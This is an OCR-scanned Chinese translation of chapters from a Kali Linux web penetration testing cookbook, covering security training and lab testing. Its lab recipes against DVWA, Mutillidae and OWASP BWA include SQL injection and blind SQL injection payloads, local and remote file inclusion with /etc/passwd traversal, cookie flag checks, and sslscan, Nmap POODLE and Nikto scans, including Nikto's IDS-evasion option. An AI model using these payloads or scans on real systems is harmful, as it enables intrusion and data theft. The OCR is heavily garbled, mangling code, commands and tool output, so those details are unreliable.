这 个 错误 信息 告诉 我 们 ， 我 们 修改 了 生成 好 的 查询 。 这 并 不 意味 着 这 里 确实 有 SQL XE 
入 ， 但 是 我 们 可 以 更 进一步 


4. 返回 DWVA/SQL 注入 页 面 。 


5， 为 了 验证 是 否 有 基于 错误 的 SQL 输入 ， 我 们 尝试 另 一 个 输入 : 1' (两 个 单 引 号 ) 。 


Vulnerability: SOL Injection 
User ID: 
| 


ID: 1'' 
First name: admin 
Surname: admin 





现在 ， 我 们 要 执行 基本 的 SQL 注入 攻击 ， 在 输入 框 中 输入 ' or '1'='1 并 提交 。 


Vulnerability: SQL Injection 











| | | Submit 
Brute Force | fm c. Xu 
Command Execution | First name: admin 
-一 一 Surname: admin 
CSRF 
à; ID: '" or '1'-'i 
Insecure CAPTCHA | First name: Gordon 
Surname: Brown 
File Inclusion | inest cium 
SOL Injection i or l=) 
le First name: Hack 
SQL Injection (Blind) — surname: Me 
Upload | ID: ' or '1'z'1 
I First name: Pablo 
X55 reflected | Surname: Picasso 


First name: Bob 





DVWA Security | Surname: Smath 
ID "wr 1:1 
JP Into 
[o — First name: user 
About | Surname: user 


看 起 来 我 们 获取 了 所 有 数据 库 中 的 注册 用 户 。 


工作 原理 


SQL 注入 发 生 在 输入 在 用 于 组 成 数据 库 查 询 之 前 没有 校 验 的 时 候 。 让 我 们 假设 服务 端的 代码 
(PHP) 拼装 了 一 个 请 求 ， 例 如 : 


$query = "SELECT * FROM users WHERE id-'".$ GET['id']. "'"; 


这 意味 着 ， id 参数 中 发 送 的 数据 会 被 集成 进来 ， 因 为 它 在 查询 里 面 。 将 参数 的 引用 替换 为 它 
的 值 ， 我 们 能 得 到 : 


$query = "SELECT * FROM users WHERE id=""."1". 


所 以 ， 当 我 们 发 送 亚 意 输入 ， 就 像 之 前 那样 ， 代 码 行 会 由 PHP 解释 器 读 取 ， 就 像 : 


$query = "SELECT * FROM users WHERE id="'"."' Or "1'="'1".""'", 


拼接 为 : 

$query = "SELECT * FROM users WHERE id='' or 'i1'z'1''; 
这 意味 着 “选择 users 表 中 的 任何 条 目 ， 只 要 用 户 id 等 于 空 或 者 1 等 于 1”*。 然 而 1 永远 等 于 
1， 这 就 意味 着 所 有 用 户 都 复合 条 件 。 我 们 发 送 的 第 一 个 引号 闭合 了 原始 代码 中 的 做 引号 ， 之 
后 我 们 输入 了 一 些 SQL 代码 ， 不 带 有 闭合 的 单 引 号 ， 而 是 使 用 已 经 在 服务 端 代码 中 该 设置 好 
的 单 引 号 。 
更 多 


SQL 攻击 比 起 显 式 应 用 的 用 户 名 ， 可 能 导致 更 严重 的 破坏 。 通 过 利用 这 些 漏洞 ， 攻 击 者 可 能 
会 通过 执行 命令 和 提 权 来 控制 整个 服务 器 。 它 也 能 够 提取 数据 库 中 的 所 有 信息 ， 包 括 系统 用 
户 名 称 和 完 码 。 取 决 于 服务 器 和 内 部 网 络 的 配置 ，SQL 注入 漏洞 可 能 是 整个 网 络 和 内 部 设施 
入 侵 的 入 口 。 


4.7 i£. $] SQL 8 7x 
我 们 已 经 看 到 了 SQL 注入 漏洞 如 何 工 作 。 这 个 秘籍 中 ， 我 们 会 涉及 到 相同 类 型 漏洞 的 不 同 变 
体 ， 它 不 显 式 任何 能 够 引导 我 们 利用 的 错误 信息 或 提示 。 我 们 会 学 习 如 何 识 别 SQL 育 注 。 
TR TE 2p JE 

1. 登录 DVWA 并 访问 SQL Injection (Blind) ° 

2.， 它 看 起 来 像 是 我 们 上 一 章 了 解 的 SQL 注入 。 在 输入 框 中 输入 1 并 点 击 submit ° 


3. 现在 我 们 首次 测试 1! e 


Vulnerability: SQL Injection (Blind) 


User ID: 














Subrnil 





我 们 没有 得 到 任何 错误 信息 ， 但 是 也 没有 结果 ， 这 里 可 能 会 发 生 一 些 有 趣 的 事情 。 


4 我 们 第 二 次 测试 1 o 


Vulnerability: SOL Injection (Blind) 


User ID: 


|| Submit 


ID: pg 
First name: admin 
Surname: admin 





TD=1 的 结果 显示 了 ， 这 意味 着 上 一 个 结果 i] 产生 了 错误 ， 并 被 应 用 捕获 和 处 理 掉 了 。 
很 可 能 这 里 有 个 SQL 注入 漏洞 ， 但 是 它 是 盲 注 ， 没 有 显示 关于 数据 库 的 信息 ， 所 以 我 们 


ILE 


5. 让 我 们 尝试 识别 ， 当 用 户 注 入 永远 为 假 的 代码 会 发 生 什 么 。 将 1 and '1'='2 设置 为 用 户 
的 ID ° 


dC 永远 不 会 等 于 ,2，， 所 以 没有 任何 记录 符合 查询 中 的 条 件 ， 并 且 没有 人 恶化 结果 。 
6. 现在， 尝试 当 ID 存在 时 永远 为 丨 的 请 求 : 1' and '1'='1 ° 
Vulnerability: SQL Injection (Blind) 


User ID: 


|| Submit | 


ID: 1! and omo 
First name: admin 
Surname: admin 





这 演示 了 页 面 上 的 育 注 。 如 果 我 们 的 永远 为 假 的 SQL 注入 得 到 了 不 同 的 响应 ， 并 且 永远 
为 丨 的 结果 得 到 了 另 一 个 响应 ， 这 里 就 存在 汤 洞 ， 因 为 服务 器 会 执行 代码 ， 即 使 它 不 显 
示 在 响应 中 。 


工作 原理 


基于 错误 的 SQL 输入 和 育 注 都 存在 于 服务 端 ， 也 就 是 漏洞 的 那 一 段 。 应 用 在 使 用 输入 生成 数 
据 库 查询 之 前 并 不 过 滤 输 入 。 二 者 的 不 同 存在 于 检测 和 利用 上 。 


在 基于 错误 的 SQL 注入 中 ， 我 们 使 用 由 服务 器 发 送 的 错误 来 识别 查询 类 型 ， 表 和 列 的 名 称 。 


另 一 方面 ， 当 我 们 视图 利用 育 注 时 ， 我 们 需要 通过 问 问题 来 得 到 信息 。 例 

Je ^» "' and name like 'a%" 的 意思 是 ， “是否 和 存在 以 'a' 开头 的 用 户 2 ”如 果 我 们 得 到 了 负面 
响应 ， 我 们 会 询问 是 否 有 以 'pb' 开头 的 名 称 。 在 得 到 正面 结果 之 后 ， 我 们 会 就 会 移动 到 第 二 
个 字符 . "' and name like 'ba%" ? 所 以 我 们 会 花费 很 多 时 ja] 来 检测 和 利用 9 


7 IL 


下 面 的 信息 可 能 有 助 于 更 好 的 了 解 SQL 8: 


e https://www.owasp.org/index.php/Blind_ SQL Injection 
e https://www.exploit-db.com/papers/13696/ 
e https://www.sans.org/reading-room/whitepapers/securecode/sqlinjection-modes-attack- 


defence-matters-23 


4.8 识别 Cookie 中 的 漏洞 


Cookie 是 从 网 站 发 送 的 小 型 数据 片段 ， 它 储存 于 用 户 的 浏览 器 中 。 它 们 包含 有 关于 这 种 浏览 
ds vindiüsiin Web 应 用 用 户 的 信息 。 在 现代 Web 应 用 汇总 ，Cookie 用 于 跟踪 用 户 的 会 话 。 
过 在 服务 端 和 穴 户 端 保存 Session ID， 服 务 器 能 够 同时 识别 由 不 同和 客户 端 产 生 的 不 同 请 
z: 当 任 何 请 求 发 送 到 服务 器 的 时 候 ， 浏 览 器 添加 Cookie 并 之 后 发 送 请 求 ， 服 务 器 可 以 基于 

这 个 COokie 来 识别 会 话 。 


这 个 秘籍 中 ， 我 们 会 学 到 如 何 识 别 一 些 漏洞 ， 它 们 允许 攻击 者 劫持 有 效用 户 的 会 话 。 


操作 水 
1. 3$ |*| http://192.168.56.102/mutillidae/ ° 
2. 打开 Cookie Manager-* 并 且 删 除 所 有 Cookie。 这 可 以 防止 与 之 前 的 Cookie 产生 混乱 。 


3. 现在 ， 在 Mutillidae ll 中 ， 访 


站 owASP Top 10 | A3 - Broken Authentication and Session Management | Cookies ° 


4. 在 Cookies Manager* 中 ， 我 们 会 看 到 出 现 了 两 个 新 的 
Cookie ° PHPSESSID 和 showhints 。 选 项 前 者 并 点 击 Edit 来 查看 所 有 参数 。 


File Edt View Tools Help 
Search: 只 +| Refresh 


] Site " Name m 





[^ 192160-—- 
[ 19216 


Edit Cookie 
Name: «| PHPSESSID 
Content Ww h6753hed77fu5951 teggl jib6 26 


Host wj 192.158.55.107 






Path: ~) i 
Send For: V| Any type of connection - 
Http Only: 9| No - 


Expires: : | at end of sess... 





Save Close 


At end of session 


Add || Edit | Delete Close 





PHPSESSID 是 基于 PHP 的 Web 应 用 的 会 话 默认 名 称 。 通 过 查看 Cookie 中 参数 值 ， 我 们 
可 以 看 到 它 可 以 经 过 安全 和 不 安全 的 频道 (HTTP 和 HTTPS) 发 送 。 同 样 ， 它 可 以 被 服 
务 器 读 取 ， 以 及 被 客户 端 用 过 脚本 代码 读 取 ， 因 为 它 并 没有 开局 HTTPOnly 标识 。 这 就 
是 说 ， 这 个 应 用 的 会 话 可 以 被 动 持 。 


工作 原理 


这 个 秘籍 中 ， 我 们 检查 了 Cookie 的 茶 些 之 ， 虽 然 并 不 像 上 一 个 那么 明显 。 在 每 次 渗透 测试 中 
检查 Cookie 的 配置 非常 重要 ， 不 正确 的 会 话 Cookie 设置 会 打开 会 话 劫持 攻击 的 大 门 ， 以 及 
错误 使 用 受信 任 的 用 户 账户 。 


如 果 Cookie 没 开 启 HTTPOnly 标识 ， 他 就 可 以 被 脚本 读 取 。 因 此 ， 如 果 存 在 跨 站 脚本 攻击 漏 
洞 ， 攻 击 者 就 能 够 得 到 有 效 会 话 的 ID， 并 且 使 用 它 来 模拟 应 用 中 的 丨 实用 户 。 


I% 


Cookies Manager+ 中 的 安全 属性 ， 或 者 send For Encrypted Connections only 选项 告诉 浏览 
器 只 通过 加 密 的 频道 发 送 或 接受 该 Cookie (也 就 是 说 ， 只 通过 HTTPS) 。 如 果 这 个 标志 没 
有 设置 ， 攻 击 者 可 以 执行 中 间 人 攻击 (MITM) ， Juan x HTTP 来 得 到 会 话 Cookie * iX & 
使 它 显 示 为 纯 文 本 ， 因 为 HTTP. 是 个 纯 文 本 的 协议 。 这 就 再 次 产生 了 攻击 者 能 够 通过 持 有 会 
i& ID 来 模拟 有 效用 户 的 场景 。 


更 多 
就 像 PuPsEssID 是 PHP 会 话 Cookie 的 默认 名 称 那 样 ， 其 它 平台 也 拥有 名 称 ， 例 如 


©  ASP.NET SessionId 是 ASP.NET 会 话 Cookie 的 名 称 。 


e JSESSIONID 是 JSP 实现 的 会 话 Cookie ° 
OWASP 有 一 篇 非常 透彻 的 文章 ， 关 于 保护 会 话 ID 和 会 话 Cookie » 


https://www.owasp.org/index.php/Session Management Cheat Sheet 


4.9 使 用 SSLScan 获取 SSL f» TLS 信息 


我 们 在 茶 种 程度 上 ， 人 假设 当 一 个 连接 使 用 带 有 SSL 或 TLS «55; HTTPS 时 ， 它 是 安全 的 ， 
而 且 任 何 试图 拦截 它 的 攻击 者 都 只 会 得 到 一 些 无 意义 的 数字 。 人 但是， 这 并 不 绝对 正确 : 
HTTPS 服务 器 需要 正确 配置 来 提供 有 效 的 加 客 层 ， 并 保护 用 户 不 受 MTM 攻击 或 冤 码 分 析 。 
一 些 SSL 协议 的 实现 和 设计 上 的 漏洞 已 经 被 发 现 了 ， 所 以 ， 我 们 在 任何 Web 应 用 渗透 测试 
中 都 要 测试 安全 连接 的 强制 性 。 

这 个 秘籍 中 ， 我 们 会 使 用 SSLScan， 它 是 Kali Linux 所 包含 的 工具 ， 基 于 服务 器 的 安全 通信 
来 分 析 服 务 器 的 配置 文件 〈 从 客户 端的 角度 ) 。 


TETTE JE 


OWASP BWA 虚拟 机 已 经 配置 好 了 HTTPS 服务 器 ， 为 了 确保 它 正 常 工作 ， 访 问 
https://192.168.56.102/， 如 果 页 面 没有 正常 加 载 ， 你 可 能 需要 在 继续 之 前 检查 你 的 配置 文 
件 。 


1. SSLScan 是 个 命令 行 工 具 (内 建 于 Kali) ， 所 以 我 们 需要 打开 终端 


2. 基本 的 sslscan 命令 会 提供 给 我 们 服务 器 的 足够 信息 。 


sslscan 192.168.56.102 


| B ji Q7 t Ia. j B Š 
Version: 
OpenSSL 1.0.1m-dev xx XXX XXXYX 


Testing SSL server on port 


jil i MENS PR" oque Py pe 
ILS renegotiation; 


session renegotiation supported 


[LS Compression: 
Compression 


to haartbtensc 
to heartbleed 





输出 的 第 一 部 分 告诉 我 们 服务 器 的 配置 ， 包 含 第 见 的 安全 错误 配置 : 重 协商 、 压 缩 和 
Heartbleed， 它 是 最 近 在 一 些 TLS 实现 中 发 现 的 漏洞 。 这 里 ， 一 切 看 起 来 都 很 好 。 


 ipher( 
Bits 
bits 
bits 
bits 
bits 
bits 
bits 
bits 
bits DHE-RSA-AES256 -SH/ 
bits  AES255-SHA 
bits  DHE-RSA-AES12 
bits  AESI28-SHA 
bits 
Dits 
bit: 7 EDH- RS 
bits DES=CB 
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Be 
Ac 
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Ac 
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"IPIE EP PP 
| 
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[uh NE uS NE | E [4h BE r DIE Cwl 





在 第 二 部 分 中 ，SSLScan 会 展示 服务 器 接受 的 加 密 方 式 。 正 如 我 们 看 到 的 那样 ， 它 支持 
SSLv3 和 一 些 例如 DES 的 方式 ， 它 现在 是 不 安全 的 。 它 们 以 红色 文字 展示 ， 黄 色 文字 代 
表 中 等 强度 的 加 密 。 


bits DHE-RSA- AES256 -SHA 
TLSv1.0 bits  DHE-RSA-AES256 -SHA 


T 
E 


ture NLoorithi: 
y strength: 


jact: owaspbwa 





Oo 


' 我 们 看 到 了 首选 的 加 客 方 式 ， 如 果 客 尸 端 支持 它 ， 服 务 器 会 党 试用 于 通信 。 服 
终 ， "Bad opted ole 法 用 于 签名 ， 并 
使 用 RSA 35 E 4B » 944 2.89 o’ FL 29 465.78. 1024 位 的 长 度 ， 安 全 标准 推荐 至 少 2048 


位 。 


工作 原理 


SSLScan 通过 创建 多 个 到 HTTPS 的 链接 来 工作 ， 并 党 试 不 同 的 加 密 方 式 和 客户 端 配置 来 测 
试 它 接受 什么 。 


当 浏 览 器 链接 到 使 用 HTTPS 的 服务 didi ， n 览 器 可 以 使 用 什么 以 及 服务 器 支持 
什么 的 信息 。 之 后 它们 在 使 用 高 度 复杂 的 算法 上 达成 一 致 。 如 果 配 置 不 当 的 HTTPS 服务 器 上 
出 现 了 MITM 攻击 ， ee fr AP P ERIBSRRA 法 来 欺骗 服务 器 ， 假 如 是 
SSLv2 上 的 56 位 DES。 之 后 攻击 者 会 拦截 使 用 该 算法 加 守 的 通信 ， 通 信 可 能 会 在 几 天 或 几 
小 时 之 内 使 用 现代 计算 机 破解 。 


P 


就 像 我 们 之 前 提 到 的 那样 ，SSLScan 能 够 检测 Heartbleed， 这 是 一 个 最 近 在 OpenSSL 实现 
中 发 现 的 有 趣 漏 洞 。 


Heartbleed 在 2014 年 四 月 被 发 现 。 它 由 一 个 缓冲 区 导致 ， 多 于 允许 的 数据 可 以 从 内 存 中 读 
出 ， 这 是 OpenSSL TLS 中 的 情况 。 


实际 上 ，Heartbleed 可 以 在 任何 未 装 补 丁 的 支持 TLS 的 nen. (1.0.1 到 1.0.1f ZI ) 
服务 器 上 利用 。 它 从 服务 器 内 存 中 读 取 64 KB 的 纯 文本 数据 ， 这 能 够 重复 执行 ， 服 务 器 上 不 
会 留 下 任何 踪迹 或 日 志 。 这 意味 着 攻击 者 可 以 从 服务 器 读 取 纯 文本 信息 ， 包 括 服务 器 的 的 私 
钥 或 者 加 窗 正 是 ， 会 话 Cookie 或 HTTPS 请 求 会 包含 用 户 的 密码 或 其 它 敏 感 信息 。 更 多 
Heartbleed 的 信息 请 见 维基 百科 : <https://en.wikipedia.org/wiki/ Heartbleed» » 


为 见 


SSLScan 并 不 是 唯一 从 SSL/TLS 获取 加 密 信 息 的 攻击 。Kali 中 也 有 另 一 个 工具 叫做 SSLyze 
可 以 用 作 替 代 ， 并 且 有 时 候 会 提供 额外 信息 给 攻击 者 。 


sslyze --regular www.example.com 
SSL/TLS 信息 也 可 以 通过 OpenSSL 命令 获得 : 


openssl s client -connect www2.example.com:443 


4.10 查找 文件 包含 


文件 包含 漏洞 出 现在 开发 者 使 用 请 求 参数 的 时 候 ， 在 服务 端的 代码 中 ， 参 数 可 以 被 用 户 修改 
来 动态 选择 加 载 或 包含 哪个 页 面 。 如 果 服 务 器 执行 了 所 包含 的 文件 ， 这 种 汤 洞 可 能 导致 整个 
f. 0 元 的 沦陷 ? 


这 个 秘籍 中 ， 我 们 会 测试 Web 应 用 来 发 现 是 否 含有 文件 包含 漏洞 。 
JR TE 2p 8 


1. 登录 DVWA 并 访问 File Inclusion ° 


2. 我 们 需要 编辑 GET 参数 来 测试 包含 。 让 我 们 党 试 index.php ° 


OWASP Mantra | 
e nttp.//192.16...gezindex php = © 
Em 二 192 168.56 102/í dal uwiilmserabiLibies i "i -i ei | i m t A E - wt EI ^ RD m n * 


-Hew»oc T 


看 起 来 E 录 中 没有 index.php 文件 (或 者 它 为 " : 也 可 能 这 意味 着 本 地 文件 包含 
(LFI) 可 能 出 现 。 


3. 为 了 党 试 LFI， 我 们 需要 了 解 本 地 丨 正 存在 的 文件 名 称 。 我 们 知道 了 DVWA 根 目录 下 存 
在 index.php ， 所 以 我 们 对 文件 包含 尝试 目录 人 遍历， 将 页 面 遍历 设置 
为 ../../index.php ° 


Damn Vulnerable Web App (DV WA) v1.8 z Welcome = OWASP Mantra 
图 Damn vulnerable Wob App ... = 


m 132.168.55.10 Z/d'ewa/vulrierabilities/TU? page=. index.php bA rO 











Welcome to Damn Vulnerable Web App! 


Damn 'Vulnerabie Web App (CVV) is a PHPIMSOQL web application that is damn vulnerable. its main goats 
are t3 be an ad for securiby professianals ta test their skills and tools in alega argireniment, help wab degeiopsrg 
batter understand tha prüocassas o! securing web applications and ad teacherséstudents to teacfiTearn wah 
application security in a clazs mam grreiranment 


e- Heyart 





Brute Force | WARNING! 


Command Execulian Ps 

= Damn VVulnarabéa Web App is damn vulnerable! Do not upload it to your basting providers public bimë udar or 
CSRE amy in&égmat tacirsg web sarzer as È will ba campromisad. Vis racamemand dowricadng and installing XAMIE 
一 anto a lacal machine indè ynur LAN wich r& used Selely ar testing 
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这 样 我 们 就 演示 了 LFI 可 能 出 现 ， 并 且 路 径 遍 历 也 可 能 出 现 〈 使 用 ../../ o RRRA 
了 目录 树 ) 。 


4. 下 一 步 是 尝试 远程 文件 包含 ， 包 括 储存 在 另 一 个 服务 器 的 我 呢 间 ， 而 不 是 本 地 文件 ， 由 
于 我 们 的 测试 虚拟 机 并 没有 连接 互联 网 (或 者 它 不 应 该 联网 ， 出 于 安全 因素 ) RANZ 
试 带 有 完整 URL 的 本 地 文件 ， 就 像 它 来 自 另 一 个 服务 器 那样 。 我 们 也 会 尝试 包含 
Vicnum 的 主页 ?page-http://192.168.56.102/vicnum/index.html ， 通 过 提供 页 面 的 URL 
作为 参数 ， 就 像 下 面 这 样 : 


Welcome to Vienum x SMART «your IT security. o.. * | Welcome to Vicnum x éy 
EM -8:8.56.102/dvwalvulnerabilitias/fi/? page-https-//192. 158.56. 10 2/ecnumfindex. html. Googl bI OG m pk 2 FW x* 





applicati ins demonstrate common web securty p robiems such as cross site scnpung, Sa injecbons, and session managemen 1891685 


到 
* 
i 
g vicium is an OWASP prijeci consisting of muttiple vulnerable web applications based on games commonly used to kill time, Thes i 
wu 
uie [ a * 
, Being small web applications with ro complex framework imeolved, Vicnum applications can easily be invoked and tailored to meet a speci 
need. For example if a test vulnerable application i$ needed in evaluating a web secunty scanner or a web anplication firewall, vou might | 
Me wantto control a target web application to see what the scanner can find and what the firewal can protect 
itat) 
Ultimately the major goal of this project is to strengthen security of web applications by educating different groups (students, management, 
-y! users, developers, auditors) as to what might go wrong in a web app. And of course its OK to have a ittie fun 


$ Click re tp play Guessnum, a game to guess a number ihe computer nas pikad 
Click 1e Io play Sotto. a game io guess a word ihe cormputer has picked. 
Gt Clck tere for the Unton Challenge 


Yerum applications ran be demanstratecd at secunhty ranserenices and used m "Capsure thia Flag" ipa events, Clic boje to ponitact us Tou would e ta discuss custormcing 
E Vicrmum applications Tur a spachit purpasa For ganaral commentis nn he propec! piata uisit ih LAWA SE ptrogect pags 


ia Mot idet aj Hausen 
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我 们 能 够 通过 提供 完整 URL. 使 应 用 加 载 页 面 ， 这 意味 着 我 们 可 以 包含 远程 文件 ， 因 此 ， 
存在 远程 文件 包含 (RFI) 。 如 果 被 包含 文件 含有 服务 端 可 执行 代码 (例如 PHP) ， 这 
种 代码 会 被 服务 端 执行 。 因 此 ， 攻 击 者 可 以 执行 远程 命令 ， 这 样 的 话 ， 整 个 系统 很 可 能 
沦陷 。 


工作 原理 
o 果 我 们 使 用 DVWA 的 view Source 按钮 ， 我 们 可 以 看 到 服务 端 代码 是 : 


<?php 
$file = $ GET['page']; //The page we wish to display 
?» 


CURAR page 变量 的 值 直接 传 给 了 文件 名 称 ， 之 后 它 被 包含 在 代码 中 。 这 样 ， 我 们 可 以 在 服 
im 包含 和 执行 任何 我 们 想 要 的 PHP. X; HTML. 文件 ， 只 要 它 可 以 通过 互联 网 访问 。 存 在 RFI 
辣 的 情 况 下 ， 服 务 器 一 定 会 在 配置 文件 中 打开 allow url fopen 和 allow url include ° 4 
VERA AES ER XUOARRA EE - 


新 x^ (xm 
X h 


= 


= 
c) 


P 


我 们 也 可 以 使 用 本 地 文件 包含 来 显示 主机 操作 系统 的 相关 文件 。 例 如 ， 试 着 包 
Ae Le... f ..letc/passud ， 之 后 你 就 会 得 到 系统 用 户 和 它们 的 主 目 录 ， 以 及 默认 shell 
的 列表 。 


4.11 识别 POODLE 漏洞 


就 像 上 一 章 提 到 的 那样 ， 使 用 SSLScan 获得 HTTPS 参数 在 一 些 条 件 下 是 可 能 的 ， 尤 其 是 中 
间 人 攻击 者 降级 用 于 加 移 通 信 的 安全 协议 和 加 冤 算 法 的 时 候 。 


POODLE 攻击 使 用 这 种 条 件 来 将 TLS 通信 降级 为 SSLv3 并 强制 使 用 易于 被 攻破 的 加 密 算 法 
(CBC) 。 


这 个 秘籍 中 ， 我 们 会 使 用 Nmap 脚本 来 检测 这 种 漏洞 在 测试 服务 器 上 是 否 存在 。 
准备 

我 们 需要 安装 Nmap 并 下 载 特定 为 检测 此 漏洞 而 编写 的 脚本 。 

1. 35 l7] http://nmap.org/nsedoc/scripts/ssl-poodle.html ° 


2. F ssl-poodle.nse 文件 。 


3. 假设 它 下 载 到 了 你 的 Kali 中 的 /root/Downloads 中 。 下 载 打 开 终 端 并 将 它 复 制 到 Nmap 
的 脚本 目录 中 : 


cp /root/Downloads/ssl-poodle.nse /usr/share/nmap/scripts/ 


File Edit Wiew Search Terminal Flaln 


mmap --script ssl-poodle 


Starting Naap 6.47 | http://nmap.org ) at a 


mr 在 号 Eg GA TAF] 
K E i a e CS |. 192 L 168 TEE EX 
=, "A 
[| LI 


Apache httpa 2.2.14 ([(Ubuntu) Mim o 1a 4.3 PHP/5.3.2-lubuntuá.5 with Suhosin-Patc 
n/3.3.1 Pythan/2.5.5 mod ss1/7.2.14 OpenSSL...) 


as used in ÜpenssL thraughn 1.0.11 and 
athar. pri aduc ts, uses NoNndeatermninistic CEG padding, which makeas it easiër 
for man-in- -middle attackers to cbtain cleartext data wia a 
a aracle attack, aka the "PODGLE” issue, 
pure date: 2014-10-14 
Chack: res i uLts: 
LS RSA WITH AES 128 CBC SHA 


www . gum Tr e i IE TERI EE: 
p://osvdb. 51 
S Aa bd: rg/ -boda/ssl-poodle.pdf 





我 们 告诉 了 Nmap 要 扫描 `192.168.56.102` (我 们 的 vulnerable vm) 的 443 端口 ， 识 别 服 务 版 本 并 在 它 上 
面 执行 ssl-poodle 脚本 。 一 次 你 ， 我 们 可 以 断定 ， 服 务 器 有 漏洞 ， 因 为 它 允 许 M` TLS RSA WITH AES 1 
28 CBC SHA -加 密 算 法 的 SSLV3 ° 


工作 原理 


我 们 下 载 的 Nmap 脚本 和 测试 服务 器 建立 了 安全 通信 ， 并 判断 他 是 否 支持 SSLv3 上 的 CBC 
加 密 算 法 。 如 果 支 持 ， 它 就 存在 漏洞 。 漏 洞 会 导致 任何 拦截 的 信息 都 能 被 攻击 者 在 很 短 的 时 
间 内 解密 。 


75 X, 
为 了 更 好 理解 这 个 攻击 ， 你 可 以 查看 一 些 这 个 加 密实 现 最 基本 的 解释 。 


e Moller, Duong, and Kotowicz, This POODLE Bites: Exploiting the SSL 3.0 Fallback, 
https://www.openssl.org/-bodo/ssl-poodle.pdf 

e https://en.wikipedia.org/wiki/Padding oracle attack 

e https://en.wikipedia.org/wiki/Padding 9e28cryptography9629:ZBlock cipher mode of op 
eration 


第 五 草 自动 化 扫描 
作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


几乎 每 个 渗透 测试 项 目 都 需要 遵循 严格 的 日 程 ， 多 数 由 客户 的 需求 或 开发 交谈 日 期 决定 。 对 
于 渗透 测试 者 ， 拥 有 一 种 工具 ， 它 可 以 在 很 短 的 时 间 内 执行 单个 应 用 上 的 多 个 测试 ， 来 尽 可 
能 在 排 期 内 识别 最 多 漏洞 很 有 帮助 。 自 动 化 漏洞 扫描 器 就 是 完成 这 种 任务 的 工具 ， 它 们 也 用 
于 发 现 替 代 的 利用 ， 或 者 确保 渗透 测试 中 不 会 遗漏 了 明显 的 事情 。 


Kali 包含 一 些 针 对 Web 应 用 或 特定 Web 漏洞 的 漏洞 扫描 器 。 这 一 章 中 ， 我 们 会 涉及 到 一 些 
在 渗透 测试 者 和 安全 研究 员 中 最 广泛 使 用 工具 。 


5.1 使 用 Nikto 43 4 
每 个 测试 者 的 工具 库 中 必定 含有 的 工具 就 是 Nikto， 它 可 能 是 世界 上 使 用 最 广泛 的 自由 扫描 
às ^ XL gb (https://cirt.net/Nikto2) 上 所 说 的 那样 : 


Nikto 是 开源 (GPL) 的 Web 服务 器 扫描 器 ， 它 对 Web 服务 器 执行 综合 扫描 ， 包 含 超 过 
6700 个 潜在 的 危险 文件 或 程序 ， 检 查 超过 1250 个 服务 器 的 过 期 版 本 ， 以 及 超过 270 个 
服务 器 phe 项 ， 例 如 多 个 首页 文件 的 存在 ，HTTP JR 
务 器 选项 ， 也 会 尝试 识别 安装 的 Web 服务 器 和 和 软件。 扫描 的 项 目 和 插件 也 会 经 常 更 新 ， 
并 可 以 自动 更 新 。 


这 个 秘籍 中 ， 我 们 会 使 用 Nikto 来 搜索 Web 服务 器 中 的 漏洞 并 分 析 结 
操作 小 


1. Nikto 是 个 命令 行 工 具 ， 所 以 我 们 打开 终端 


2. 我们 会 扫描 Peruggia 漏洞 应 用 ， 并 导出 结果 到 HTML 报告 : 


nikto -h http://192.168.56.102/peruggia/ -o result.html 


Hostname: owaspbwa 
Port: i 
| 2015-08-11 


server: Apache/7.2.14 (Ubuntu) les pad is ^HP/5. -lubuntud.5 with Suhaosi 
n-Patch proxy htmL/3.8.1 mod python/3.3.1 Python/2.6.5. . Sd 251/22. ]4 ÜpenssL/à3 
9.8K Phusion  Passenger/3.8.17 mod perl/2.8.4 Perl/v5.18.1 

Retrieved x-powered-by header: PHP/5.3.2-Iubuntuá.5 


Ihe anti-clickjacking X-Frame-üÜptions hoë der is not present. 
Cookie PHPSESSID created without the httponly flag 
No Ol Directories found (use -L all to force check a 
IP address found in the 'location' header. The IP is "l P à 
- OSVDB-630: IIS may reveal its internal or real IP in the catio 1 header wi 
request to the /images directory. Ihe value is "http://12/ ruggia/ im: 


be outdated (current 1s at 
i tinal release) and 2.2.26 are also current. 


s5L,/2.2.14 appears to be outdated (current is at least 2.8.31) [may depend 


outdated (current is al 





-h 选项 告诉 Nikto 扫描 哪个 主机 ， -o 选项 告诉 在 哪里 存放 和 输出， 文件 的 扩展 名 决定 了 
亦 受 的 格式 。 这 里 ， 我 们 使 用 .html 来 获得 HTML 格式 的 结果 报告 。 输 出 也 可 以 以 
CSV ` TXT 或 XML 格式 。 


3， 它 需要 一 些 时 间 来 完成 扫描 。 完 成 之 后 ， 我 么 可 以 打开 result.html 文件 : 


Nikto Report M 


m File: lllraat/result. html El = 


owaspbwa / 192.168.56.102 





port 80 

Target IP 1597 168.56.102 

Target hostname owaspbwa 

Target Port Bo 
Apache/2.2.14 (Ubuntu) mod rmona/2.4.3 PHP/5.3.2-1ubuntu&.5 with Suhasin Patch 

HTTP Server proxy htrn/3.Q0.1 mod py thon/3.3.1 P ythan/2.6.5 mod ssl/2.2.14 Opens SL/0. S.Bk 
Phuslon Passe ngen 3.0.17 mo id peri/2.0.4 Perli! s .10.1 


P+ T 








-H 


sile Link (Name) 
Site Link (IP) 





URI iperuggia/ 
HTTP Method GET 
Description Retrieved x-powered-by header: PHP/5.3.2-lubuntu4.5 


p ce Go x 


o Pam 
(Ea) E 


httn-//ow aspnbwa:BÜO/peniagia/ 





Test Links http TAR =P 3 16 iH 55. 102 BO/pe nu gala 


OSWVDB Entri ies OSW DB 站 





(n € 


URI | Jperuggia/ 
HTTP Method GET 
Description The anti-clickjacking X-Frame-Options header ls not present 


hEEP (YET Wa; 1. B J/penuggia/ 


lest Links 





OSVDHB Entries 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 Nikto 来 扫描 应 用 并 生成 HTML 报告 。 这 个 工具 拥有 一 些 更 多 的 选 
项 ， 用 于 执行 特定 扫描 或 生成 特定 输出 格式 。 一 些 最 实用 的 选项 是 : 


e H :这 会 显示 Nikto 的 帮助 。 
e -config «file» : 在 扫描 中 用 自 定 义 的 配置 文件 。 
e -update : 更 新 插件 数据 库 。 


e Format «format» : 这 定义 了 输出 格式 ， 可 以 为 CSV、HTML ^ NBE (Nessus) >` 
SQL ` TXT 或 XML。 例 如 CSV、XML 和 NBE 的 格式 在 我 们 打算 将 其 用 于 其 它 工 具 的 输 
入 时 非 第 实用 。 


e -evasion «techique» : 这 使 用 一 些 编码 技巧 来 帮助 避免 Web 应 用 防火 墙 和 入 侵 检 测 系 
统 的 检测 。 


e -list-plugins : 查看 可 用 的 测试 插件 。 
